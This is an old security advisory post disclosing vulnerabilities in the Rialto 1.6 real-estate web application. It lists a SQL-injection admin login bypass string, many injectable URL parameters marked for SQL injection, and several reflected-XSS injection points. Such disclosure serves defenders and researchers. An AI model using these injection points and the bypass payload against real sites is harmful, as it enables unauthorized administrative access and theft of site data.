Rialto 1.6[admin login bypass & multiples injections sql] Nov 20 2006 02:53AM
saps audit gmail com
vendor site: http://www.grandora.com/
product : Rialto 1.6
bug:multiples injection sql , login bypass , xss
risk : high !

admin login bypass :
/admin/default.asp
username: ' or '1' = '1
passwd: ' or '1' = '1

injection sql :
/listfull.asp?ID='[sql]
/listmain.asp?cat='[sql]
/printmain.asp?ID='[sql]
/searchkey.asp?Keyword='[sql]
/searchmain.asp?I1=1&area='[sql]
/searchoption.asp?I12=1&cat='[sql]
/searchmain.asp?I1=1&area=all&cat='[sql]
/searchoption.asp?I12=1&cat=all&area='[sql]
/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[
sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&
acreage2=.5&squarefeet1='[sql]

xss get :
/listmain.asp?cat=[xss]
/searchkey.asp?Keyword=[xss]
/searchmain.asp?I1=1&area=all&cat=[xss]
/forminfo.asp?refno=[xss]

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus